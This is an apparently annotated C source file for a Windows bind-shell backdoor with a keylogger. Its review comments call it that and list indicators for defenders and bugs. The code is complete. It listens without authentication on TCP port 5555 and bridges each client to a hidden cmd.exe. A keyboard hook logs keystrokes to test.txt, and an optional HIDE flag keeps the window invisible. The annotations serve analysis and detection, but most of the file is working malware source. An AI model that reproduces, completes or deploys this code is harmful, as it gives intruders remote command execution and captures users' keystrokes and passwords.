/*
 * NOTE(review): What this file is.
 *
 * This is a Windows bind-shell backdoor combined with a keystroke logger,
 * not a general-purpose network service:
 *   - WaitConnect() listens on TCP port SERVICE_PORT (5555) on every
 *     interface (INADDR_ANY), with no authentication and no encryption.
 *   - AcceptConnect() hands the first client that connects an interactive,
 *     hidden cmd.exe whose stdin/stdout/stderr are bridged to the socket.
 *   - MySetHook() (HookDll, declared in keyhook.h) installs a keyboard hook;
 *     WndProc appends one byte per WM_KEYHOOK message to FILE_NAME
 *     ("test.txt" in the process's working directory).
 *   - Defining HIDE (commented out below) suppresses the window entirely.
 *
 * Anyone who can reach port 5555 gets a shell running as the user of this
 * process.  Indicators a defender can key on from this source alone: the
 * listening port, the "connection ok!\r\n" banner sent on connect, the
 * test.txt keystroke file, the HookDll.lib dependency, and the window
 * class / title names CLASS_NAME / TITLE_NAME pulled from keyhook.h.
 *
 * The comments below document the code exactly as written, including its
 * defects; no code has been changed.
 */
#define WIN32_LEAN_AND_MEAN
/* NOTE(review): the two system #include targets were lost when this page
 * was extracted (angle brackets stripped).  From the APIs used they are
 * presumably <winsock2.h> and <windows.h>, in that order -- confirm. */
#include
#include
#include "keyhook.h"            /* MySetHook / MyEndHook / WM_KEYHOOK / CLASS_NAME / TITLE_NAME -- not visible here */
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "HookDll.lib")

LPCTSTR szWindowClass = TEXT(CLASS_NAME);
LPCTSTR szTitle = TEXT(TITLE_NAME);

//#define HIDE                  /* when defined, InitInstance never shows the window */
#define FILE_NAME "test.txt"    /* keystroke log, opened for append in WM_CREATE */
#define START_STRING "connection ok!\r\n"   /* banner sent to every accepted client */
#define SHELL_NAME "cmd.exe"    /* unqualified name, see CreateProcess note in AcceptConnect */
#define START_DIR "c:\\"        /* working directory handed to the spawned shell */
#define SERVICE_PORT (5555)     /* TCP listen port, bound on all interfaces */
#define WM_ASYNC_SELECT (WM_USER + 1)   /* WSAAsyncSelect notification message */

HINSTANCE hInst;

ATOM MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

/*
 * Per-session state for the single remote shell session this program
 * supports at a time (a second client is refused in AcceptConnect).
 *
 * NOTE(review): fd_read / fd_write are named from the child's point of view,
 * which is the opposite of what this process does with them:
 *   fd_write  = the parent's READ end of the child's stdout/stderr pipe
 *               (only ever passed to ReadFile)
 *   fd_read   = the parent's WRITE end of the child's stdin pipe
 *               (only ever passed to WriteFile)
 */
typedef struct{
    SOCKET sock;                /* accepted client socket */
    BOOL acceptFlag;            /* TRUE while no session is active */
    PROCESS_INFORMATION PI;     /* spawned cmd.exe; PI.hThread is never closed anywhere below */
    HANDLE hThread;             /* OutputToSocket pump thread */
    BOOL ThreadFlag;            /* loop flag read by OutputToSocket (plain BOOL, no synchronisation) */
    HANDLE fd_read;             /* parent write end -> child stdin */
    HANDLE fd_write;            /* parent read end  <- child stdout/stderr */
} DATA;

SOCKET WaitConnect(HWND hWnd);
BOOL AcceptConnect(SOCKET sListen, DATA *Data);
void ReadConnect(DATA *Data, HWND hWnd);
DWORD WINAPI OutputToSocket(LPVOID lpvoid);
void CloseConnect(DATA *Data);

/*
 * Entry point: registers the window class, creates the (possibly hidden)
 * window and runs a plain message loop.  All real work happens in WndProc.
 *
 * Returns msg.wParam, which after a normal WM_QUIT is the PostQuitMessage
 * exit code.  Notes:
 *   - the RegisterClassEx result is not checked;
 *   - TranslateAccelerator is called with a NULL accelerator table, so it
 *     is effectively a no-op;
 *   - on a GetMessage error (-1) the loop breaks and msg.wParam is whatever
 *     the last message carried, not an exit status.
 */
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    MSG msg;
    MyRegisterClass(hInstance);
    if (!InitInstance (hInstance, nCmdShow)) {
        return FALSE;
    }
    BOOL bRet;
    while ((bRet = GetMessage(&msg, NULL, 0, 0)) != 0) {
        if(bRet == -1) {
            break;
        }
        if (!TranslateAccelerator(msg.hwnd, NULL, &msg)) {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }
    }
    return (int) msg.wParam;
}

/*
 * Registers the window class named by szWindowClass (CLASS_NAME from
 * keyhook.h) with WndProc as its procedure.
 *
 * NOTE(review): both LoadIcon calls pass a NULL resource name, so the icon
 * handles are presumably NULL; harmless, but the class carries no icon.
 */
ATOM MyRegisterClass(HINSTANCE hInstance)
{
    WNDCLASSEX wcex;
    wcex.cbSize = sizeof(WNDCLASSEX);
    wcex.style = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc = (WNDPROC)WndProc;
    wcex.cbClsExtra = 0;
    wcex.cbWndExtra = 0;
    wcex.hInstance = hInstance;
    wcex.hIcon = LoadIcon(hInstance, NULL);
    wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
    wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
    wcex.lpszMenuName = (LPCTSTR)NULL;
    wcex.lpszClassName = szWindowClass;
    wcex.hIconSm = LoadIcon(wcex.hInstance, NULL);
    return RegisterClassEx(&wcex);
}

/*
 * Creates the main window.  Creating it fires WM_CREATE in WndProc, which
 * is where the listener, the keyboard hook and the log file are set up.
 * With HIDE defined the window is never shown, i.e. the listener and the
 * keylogger run with no visible UI at all.
 *
 * Returns FALSE if CreateWindow fails, TRUE otherwise.
 */
BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
{
    HWND hWnd;
    hInst = hInstance;
    hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
    if (!hWnd) {
        return FALSE;
    }
#ifndef HIDE
    ShowWindow(hWnd, nCmdShow);
    UpdateWindow(hWnd);
#endif
    return TRUE;
}

/*
 * Window procedure.  Owns the three pieces of global state:
 *   sListen - listening socket from WaitConnect
 *   Data    - the one active shell session
 *   wFile   - the keystroke log (FILE_NAME), opened for append
 *
 * WM_CREATE      set up listener, keyboard hook and log file
 * WM_ASYNC_SELECT socket events: accept a client, forward a byte to cmd.exe,
 *                 tear the session down on close
 * WM_KEYHOOK     posted by the hook DLL; one keystroke per message
 * WM_DESTROY     release the listener, hook and log file, then quit
 *
 * NOTE(review) on WM_CREATE error handling: each failure calls
 * DestroyWindow but does not return or break, so the remaining setup still
 * runs after WM_DESTROY has already performed its cleanup (hook and file
 * are then installed/opened after MyEndHook/CloseHandle ran on nothing).
 * The conventional way to abort creation is to return -1 from WM_CREATE,
 * which makes CreateWindow fail and InitInstance return FALSE.
 *
 * NOTE(review): WM_DESTROY only closes the listener; an active client
 * socket and its cmd.exe (Data.sock / Data.PI) are not torn down here.
 */
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    static SOCKET sListen;
    static DATA Data;
    static HANDLE wFile;
    switch (message) {
    case WM_CREATE:
        /* -1 converts to INVALID_SOCKET's value, so this comparison works
         * even though SOCKET is unsigned. */
        if((sListen = WaitConnect(hWnd)) == -1){
            DestroyWindow(hWnd);
        }
        Data.acceptFlag = TRUE;
        /* NOTE(review): assumes MySetHook returns nonzero on failure --
         * confirm against keyhook.h / HookDll. */
        if(MySetHook()){
            DestroyWindow(hWnd);
        }
        /* OPEN_ALWAYS + seek to end: keystrokes are appended across runs. */
        if((wFile = CreateFile(FILE_NAME, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE){
            DestroyWindow(hWnd);
        }
        SetFilePointer(wFile, 0, NULL, FILE_END);
        break;
    case WM_ASYNC_SELECT:
        /* FD_WRITE was also requested in WaitConnect but is not handled. */
        switch(WSAGETSELECTEVENT(lParam)) {
        case FD_ACCEPT:
            AcceptConnect(sListen, &Data);      /* return value ignored */
            break;
        case FD_READ:
            ReadConnect(&Data, hWnd);
            break;
        case FD_CLOSE:
            CloseConnect(&Data);
            Data.acceptFlag = TRUE;             /* allow the next client */
            break;
        }
        break;
    case WM_KEYHOOK:
        /* Writes only the low byte of wParam, flushing after every key.
         * NOTE(review): a declaration directly after a case label is not
         * valid C before C23; this file is presumably built as C++. */
        DWORD len;
        WriteFile(wFile, (char *)&wParam, 1, &len, NULL);
        FlushFileBuffers(wFile);
        break;
    case WM_DESTROY:
        shutdown(sListen, SD_BOTH);
        closesocket(sListen);
        WSACleanup();
        MyEndHook();
        CloseHandle(wFile);
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}

/*
 * Initialises Winsock and opens the listening socket.
 *
 * Binds TCP/SERVICE_PORT on INADDR_ANY -- every interface, no access
 * control -- and registers hWnd for FD_ACCEPT/FD_READ/FD_WRITE/FD_CLOSE
 * via WSAAsyncSelect, so socket activity arrives as WM_ASYNC_SELECT.
 *
 * Returns the listening socket, or -1 on any failure.  On failure after
 * socket() the socket is not closed here (WM_DESTROY's closesocket /
 * WSACleanup is the only cleanup).  listen() is called with backlog 0.
 */
SOCKET WaitConnect(HWND hWnd)
{
    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(2, 0), &wsaData) != 0){
        return -1;
    }
    SOCKET sock;
    if((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
        return -1;
    }
    SOCKADDR_IN Serv;
    memset(&Serv, 0, sizeof(Serv));
    Serv.sin_family = AF_INET;
    Serv.sin_port = htons((unsigned short)(SERVICE_PORT));
    Serv.sin_addr.s_addr = htonl(INADDR_ANY);
    if(bind(sock, (SOCKADDR *)&Serv, sizeof(Serv)) == SOCKET_ERROR){
        return -1;
    }
    if(listen(sock, 0) == SOCKET_ERROR){
        return -1;
    }
    if(WSAAsyncSelect(sock, hWnd, WM_ASYNC_SELECT, FD_ACCEPT|FD_CLOSE|FD_READ|FD_WRITE) == SOCKET_ERROR){
        return -1;
    }
    return sock;
}

/*
 * Accepts a client and binds it to a fresh, hidden cmd.exe.
 *
 * Flow: accept -> refuse if a session is already active -> send the
 * START_STRING banner -> create two inheritable pipes (child stdout/stderr,
 * child stdin), keep non-inheritable duplicates for this process and close
 * the inheritable originals -> CreateProcess(cmd.exe, SW_HIDE, cwd START_DIR)
 * -> read the first chunk of shell output and send it up to and including
 * the first '>' (the prompt) -> start OutputToSocket to pump further output.
 *
 * Return value is inverted relative to its BOOL type: TRUE on every error
 * path, FALSE on success.  The only caller (WndProc) ignores it.
 *
 * NOTE(review) -- defects visible here:
 *   - buf is filled by ReadFile with no NUL terminator and is not
 *     initialised, so strchr(buf, '>') can run past the 256-byte buffer,
 *     and if the '>' is the last byte, *(p + 1) = '\0' writes one byte
 *     past it.  If ReadFile fails, buf is entirely uninitialised.
 *   - output that arrives after the first '>' in that first read is
 *     discarded, not forwarded.
 *   - CreateProcess is given lpApplicationName = NULL and an unqualified
 *     "cmd.exe"; per CreateProcess's documented search order the
 *     application's own directory and the current directory are searched
 *     before the system directory, so a planted cmd.exe would be executed.
 *   - bInheritHandles = TRUE passes every inheritable handle in this
 *     process to the child, not just the three std handles; sockets from
 *     socket() are inheritable by default, so the listening and client
 *     sockets may also live on in cmd.exe -- confirm.
 *   - on the CreateThread failure path Data->sock is left open,
 *     acceptFlag stays FALSE (no further client is ever accepted) and
 *     PI.hThread is never closed (it is never closed anywhere in this file).
 *   - CreatePipe / DuplicateHandle / send return values are unchecked.
 *   - SHELL_NAME is a narrow string literal passed as lpCommandLine; this
 *     only compiles with the ANSI CreateProcessA, which does not modify it.
 */
BOOL AcceptConnect(SOCKET sListen, DATA *Data)
{
    SOCKET sock_tmp;
    SOCKADDR_IN Client;
    int ClientLen = sizeof(Client);
    if((sock_tmp = accept(sListen, (LPSOCKADDR)&Client, &ClientLen)) == INVALID_SOCKET){
        return TRUE;
    }
    /* Single-session policy: a second client is closed immediately. */
    if(Data->acceptFlag){
        Data->acceptFlag = FALSE;
        Data->sock = sock_tmp;
    }else{
        closesocket(sock_tmp);
        return TRUE;
    }
    send(Data->sock, START_STRING, (int)strlen(START_STRING), 0);
    HANDLE pfd_in[2], pfd_out[2];
    short int R = 0, W = 1;
    SECURITY_ATTRIBUTES SA;
    SA.lpSecurityDescriptor = NULL;
    SA.bInheritHandle = TRUE;       /* both ends of each pipe start inheritable */
    SA.nLength = sizeof(SA);
    HANDLE hParent = GetCurrentProcess();
    /* child stdout/stderr pipe: keep a non-inheritable read end as fd_write */
    CreatePipe(&pfd_out[R], &pfd_out[W], &SA, 0);
    DuplicateHandle(hParent, pfd_out[R], hParent, &Data->fd_write, 0, FALSE, DUPLICATE_SAME_ACCESS);
    CloseHandle(pfd_out[R]);
    /* child stdin pipe: keep a non-inheritable write end as fd_read */
    CreatePipe(&pfd_in[R], &pfd_in[W], &SA, 0);
    DuplicateHandle(hParent, pfd_in[W], hParent, &Data->fd_read, 0, FALSE, DUPLICATE_SAME_ACCESS);
    CloseHandle(pfd_in[W]);
    STARTUPINFO SI;
    ZeroMemory(&SI, sizeof(SI));
    SI.cb = sizeof(SI);
    SI.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    SI.wShowWindow = SW_HIDE;       /* the shell window is never visible */
    SI.hStdInput = pfd_in[R];
    SI.hStdOutput = pfd_out[W];
    SI.hStdError = pfd_out[W];
    if(CreateProcess(NULL, SHELL_NAME, NULL, NULL, TRUE, 0, NULL, START_DIR, &SI, &Data->PI) == 0){
        CloseHandle(Data->fd_read);
        CloseHandle(Data->fd_write);
        CloseHandle(pfd_in[R]);
        CloseHandle(pfd_out[W]);
        return TRUE;
    }
    /* The child now owns its copies; drop ours so pipe EOF works. */
    CloseHandle(pfd_in[R]);
    CloseHandle(pfd_out[W]);
    DWORD len;
    char buf[256];
    /* Blocking read of the shell's first output (banner + prompt). */
    ReadFile(Data->fd_write, buf, sizeof(buf), &len, NULL);
    char *p;
    if((p = strchr(buf, '>')) != NULL){
        *(p + 1) = '\0';
        send(Data->sock, buf, (int)strlen(buf), 0);
    }
    Data->ThreadFlag = TRUE;
    DWORD ThreID;
    if((Data->hThread = CreateThread(NULL, 0, OutputToSocket, (LPVOID)Data, 0, &ThreID)) == NULL){
        DWORD len;
        /* Ask the shell to exit, wait up to 3 s, then drop the pipes. */
        WriteFile(Data->fd_read, "exit\r\n", 6, &len, NULL);
        FlushFileBuffers(Data->fd_read);
        WaitForSingleObject(Data->PI.hProcess, 3000);
        CloseHandle(Data->PI.hProcess);
        CloseHandle(Data->fd_read);
        CloseHandle(Data->fd_write);
        return TRUE;
    }
    return FALSE;
}

/*
 * FD_READ handler: forwards exactly one byte from the client socket to the
 * shell's stdin.  This is the remote command channel -- whatever the peer
 * sends is typed into cmd.exe unmodified.
 *
 * NOTE(review): the recv return value is ignored, so on 0 (peer closed) or
 * SOCKET_ERROR the uninitialised byte c is still written to the pipe.
 * hWnd is unused.
 */
void ReadConnect(DATA *Data, HWND hWnd)
{
    char c;
    DWORD len;
    recv(Data->sock, &c, 1, 0);
    WriteFile(Data->fd_read, &c, 1, &len, NULL);
    FlushFileBuffers(Data->fd_read);
    return;
}

/*
 * Pump thread: copies the shell's stdout/stderr to the client socket until
 * ThreadFlag is cleared.  Each ReadFile blocks until the child writes.
 *
 * NOTE(review):
 *   - ThreadFlag is a plain BOOL shared with the window thread with no
 *     synchronisation (and nothing in this file ever clears it -- see
 *     CloseConnect), so in practice this loop only ends when the process
 *     does.
 *   - a failed ReadFile (e.g. broken pipe once cmd.exe exits) is not a loop
 *     exit condition, so the thread then spins at full speed.
 *   - &buf and buf have the same address, so the ReadFile call is fine
 *     despite the odd spelling.
 */
DWORD WINAPI OutputToSocket(LPVOID lpvoid)
{
    DATA *Data = (DATA *)lpvoid;
    DWORD len;
    char buf[1024];
    while(Data->ThreadFlag){
        if(ReadFile(Data->fd_write, &buf, sizeof(buf), &len, NULL) != FALSE){
            if(len > 0){
                send(Data->sock, buf, len, 0);
            }
        }
    }
    return 0;
}

/*
 * FD_CLOSE handler: tears down the session -- stop the pump thread, close
 * the socket, ask cmd.exe to exit, release handles.
 *
 * NOTE(review) -- the first statement is a bug.  `Data->hThread = FALSE;`
 * overwrites the thread HANDLE with NULL instead of clearing the loop flag;
 * the intent was almost certainly `Data->ThreadFlag = FALSE;`.  Consequences
 * as written:
 *   - WaitForSingleObject(NULL, 3000) fails immediately, nothing is waited
 *     for;
 *   - OutputToSocket's loop flag is never cleared, so the thread keeps
 *     running (it may still call send() on the socket closed just below);
 *   - CloseHandle(Data->hThread) closes NULL and the real thread handle
 *     leaks.
 * Also, PI.hThread is never closed, and WriteFile/FlushFileBuffers results
 * are ignored.  The caller (WndProc) resets acceptFlag afterwards so the
 * next client is accepted regardless.
 */
void CloseConnect(DATA *Data)
{
    Data->hThread = FALSE;
    WaitForSingleObject(Data->hThread, 3000);
    shutdown(Data->sock, SD_BOTH);
    closesocket(Data->sock);
    DWORD len;
    WriteFile(Data->fd_read, "exit\r\n", 6, &len, NULL);
    FlushFileBuffers(Data->fd_read);
    WaitForSingleObject(Data->PI.hProcess, 3000);
    CloseHandle(Data->PI.hProcess);
    CloseHandle(Data->hThread);
    CloseHandle(Data->fd_write);
    CloseHandle(Data->fd_read);
    return;
}